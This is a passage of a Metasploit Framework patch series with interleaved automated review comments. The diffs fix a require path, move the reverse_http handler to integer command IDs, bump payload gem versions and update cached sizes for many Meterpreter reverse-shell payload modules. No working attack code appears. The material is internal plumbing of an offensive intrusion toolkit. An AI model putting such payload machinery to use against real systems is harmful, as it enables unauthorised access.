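Review bot: The `reqs` hash and the `filter_commands(all, reqs)` call are left in `commands` as commented-out code with no explanation, and the commit message says only that the filter "is causing issues", so the next person to touch this file cannot tell whether the filter is broken, merely unsupported by the sniffer extension, or safe to re-enable. Either delete the block or replace it with one comment recording what was observed, e.g. `# TODO: command-id filtering disabled - filter_commands(all, reqs) caused <observed failure>; see b9013e3`. Note that with the filter gone `commands` now advertises all six sniffer commands regardless of what the connected Meterpreter reports, which is presumably the case the filter was introduced to handle.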
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
-require 'rex/post/meterpreter/exensions/android/command_ids'
+require 'rex/post/meterpreter/extensions/android/command_ids'
 require 'msf/core/auxiliary/report'
 require 'rex/google/geolocation'
 require 'date'
From 48290ac38acfcd15bff8a305b38d5b73b188ecf4 Mon Sep 17 00:00:00 2001
From: OJ
Date: Thu, 4 Jun 2020 12:01:27 +1000
Subject: [PATCH 14/20] Fix a stupid mistake with core_patch_url
This was not originally ported to an int when it should have been.
---
 lib/msf/core/handler/reverse_http.rb | 4 ++--
 lib/rex/post/meterpreter/packet.rb | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 06804b5d38324..781748ac9a1f6 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -3,6 +3,7 @@
 require 'rex/sync/ref'
 require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/core_ids'
 require 'rex/socket/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 require 'rex/user_agent'
@@ -367,8 +368,7 @@ def on_request(cli, req)
 # was generated on the fly. This means we form a new session for each.
 # Hurl a TLV back at the caller, and ignore the response
- pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE,
- 'core_patch_url')
+ pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE, Rex::Post::Meterpreter::COMMAND_ID_CORE_PATCH_URL)
 pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/")
 resp.body = pkt.to_r
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 8d1e20df7c163..fdbb33a60dde6 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
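Review bot: The replacement `pkt = Rex::Post::Meterpreter::Packet.new(...)` line in `on_request` runs to roughly 150 characters, noticeably wider than the two-line call it replaces, for no gain beyond fitting the commit into one `+` line. Keep the argument wrap: `pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE,` / `  Rex::Post::Meterpreter::COMMAND_ID_CORE_PATCH_URL)`. The `require 'rex/post/meterpreter/core_ids'` added in the first hunk is presumably what defines `COMMAND_ID_CORE_PATCH_URL`, so the fully qualified reference is the right choice here; `on_request` begins and ends outside the hunk.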
@@ -914,7 +914,7 @@ def method?(method)
 # Sets the packet's method TLV to the method supplied.
 #
 def method=(method)
- raise ArgumentError.new('Packet.method must be an integer') unless method.is_a?(Integer)
+ raise ArgumentError.new("Packet.method must be an integer. Current value is #{method}") unless method.is_a?(Integer)
 add_tlv(TLV_TYPE_COMMAND_ID, method, true)
 end
From 6f7861f17ec59e4c2e2f0698f706ed74a9464cbf Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 3 Jun 2020 07:08:06 -0500
Subject: [PATCH 15/20] bump payloads version
---
 Gemfile.lock | 8 ++++----
 metasploit-framework.gemspec | 4 ++--
 2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 06267867ce6e7..ab1fde4074c4d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -29,9 +29,9 @@ PATH
 metasploit-concern (~> 2.0.0)
 metasploit-credential (~> 3.0.0)
 metasploit-model (~> 2.0.4)
- metasploit-payloads (= 1.4.2)
+ metasploit-payloads (= 2.0.0)
 metasploit_data_models (~> 3.0.10)
- metasploit_payloads-mettle (= 0.5.21)
+ metasploit_payloads-mettle (= 1.0.0)
 mqtt
 msgpack
 nessus_rest
@@ -220,7 +220,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.4.2)
+ metasploit-payloads (2.0.0)
 metasploit_data_models (3.0.10)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
@@ -231,7 +231,7 @@ GEM
 postgres_ext
 railties (~> 4.2.6)
 recog (~> 2.0)
- metasploit_payloads-mettle (0.5.21)
+ metasploit_payloads-mettle (1.0.0)
 method_source (1.0.0)
 mini_portile2 (2.4.0)
 minitest (5.14.1)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 4c47ca16bb27f..1626ef2bad298 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
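Review bot: Interpolating `#{method}` into the new message in `method=` drops the detail that makes the failure diagnosable: a `nil` prints as nothing ("Current value is "), and a leftover string command name prints without quotes, so the reader cannot tell that a String rather than a command-id constant was passed, which is exactly the mistake the previous commit in this series fixed for `core_patch_url`. Use `inspect` and the two-argument raise form: `raise ArgumentError, "Packet.method must be an integer. Current value is #{method.inspect}" unless method.is_a?(Integer)`.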
@@ -70,9 +70,9 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 2.0.4' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.4.2' + spec.add_runtime_dependency 'metasploit-payloads', '2.0.0' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.5.21' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.0' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 6ec8e942c25ddb2908ba50a52e657069c3129512 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Wed, 3 Jun 2020 07:08:50 -0500 Subject: [PATCH 16/20] update sizes --- .../singles/apple_ios/aarch64/meterpreter_reverse_http.rb | 2 +- .../singles/apple_ios/aarch64/meterpreter_reverse_https.rb | 2 +- .../singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../singles/apple_ios/armle/meterpreter_reverse_http.rb | 2 +- .../singles/apple_ios/armle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/cmd/unix/reverse_python_ssl.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb 
| 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_http.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- 
modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/encrypted_reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb | 2 +- 67 files changed, 67 insertions(+), 67 deletions(-) diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb index c7c1c495b1ed1..7bbc59b5b259b 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 777708 + CachedSize = 777632 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb index c1c1a373dcdab..87990008ab402 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 777708 + CachedSize = 777632 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb index e2c27c8649906..4d91603df843d 100644 
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 777708 + CachedSize = 777632 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb index db1b846e595f2..1bb5f83b11015 100644 --- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 637708 + CachedSize = 621224 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb index 5a0f516b5a4ef..b02f4ec91e34e 100644 --- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 637708 + CachedSize = 621224 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb index bba532a891756..6d8ea05c9bc8d 100644 --- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 637708 + CachedSize = 621224 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index 7f32eaeea05c3..9dfd5b42beaf8 100644 
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = :dynamic + CachedSize = 629 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 55222617a4ae7..b67d638b7b10d 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1096264 + CachedSize = 1092000 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 3eec81722b6bb..c89ae043acbff 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1096264 + CachedSize = 1092000 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 595b78262aa42..15195e8da6669 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1096264 + CachedSize = 1092000 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index b4843159fbfe8..052c6fd68cfa1 100644 
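Review bot: A fixed `CachedSize = 629` looks suspicious for `cmd/unix/reverse_python_ssl`, whose previous value was `:dynamic`; every other entry in this commit only adjusts one number to another, while this one changes the kind of the value. If the generated command length depends on option values such as LHOST or LPORT, which is the usual reason a payload is marked `:dynamic` (I cannot see the generator from here), then a fixed cached size will be wrong for any target other than the one it was measured against and the line should stay `CachedSize = :dynamic`. If the size really is constant now, a sentence in the commit message saying why would save the next reader the same question.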
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025916 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index c3ed36817f20a..f4294b8c6eec0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025916 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index cd35f94d72299..3e5050eb865b9 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025916 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 08cbf0ad68a58..ef7533785117d 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025984 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index b7f1e2657e3c5..30832ec778829 100644 
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025984 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 81202f7c80e78..91206e5707965 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1025984 + CachedSize = 1022556 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 6469ea0e7b3ee..17681bf49bd34 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1573984 + CachedSize = 1568840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index b763703f31f57..3c25edfcde418 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1573984 + CachedSize = 1568840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 52d29f91b6e09..72952960eb300 100644 
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1573984 + CachedSize = 1568840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 8a0e1dd19bbe0..cbcabd049d796 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1465068 + CachedSize = 1460684 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 506cae6d6caa0..d913e35f1fb84 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1465068 + CachedSize = 1460684 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 3d4e965fd613e..5f9ab878b7658 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1465068 + CachedSize = 1460684 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index f721408ce0d53..54f5121df95eb 100644 
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1467528 + CachedSize = 1463140 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 2a2575cf4de6f..70c945448c47e 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1467528 + CachedSize = 1463140 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 533b98d337af9..d34c6f22409c0 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1467528 + CachedSize = 1463140 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 1292c8e60b3dc..31ffd2388a772 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1210912 + CachedSize = 1210840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 90d386ae732b4..8a42ae94f1e3c 100644 
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1210912 + CachedSize = 1210840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index ee743cb6184b4..fb3de8bd66d97 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1210912 + CachedSize = 1210840 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index c307a5285b87f..1aaff45081274 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1169304 + CachedSize = 1169208 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 8e5edd763281c..43bf3431b0fcc 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1169304 + CachedSize = 1169208 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 88f87c313969d..9968525605a61 100644 
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1169304 + CachedSize = 1169208 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index b79a23046af15..00a36736ee527 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1163592 + CachedSize = 1163520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index a9ec8d1a8c380..33b07d5129110 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1163592 + CachedSize = 1163520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index f3dc89c1bd4dc..95f5d59720442 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1163592 + CachedSize = 1163520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index fd61c343f39ca..e861b30f0c98b 100644 
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1036536 + CachedSize = 1032344 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index c1c05e5320085..b52934aa3ab3b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1036536 + CachedSize = 1032344 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index a14ec687a96e3..69247e80eed9b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ 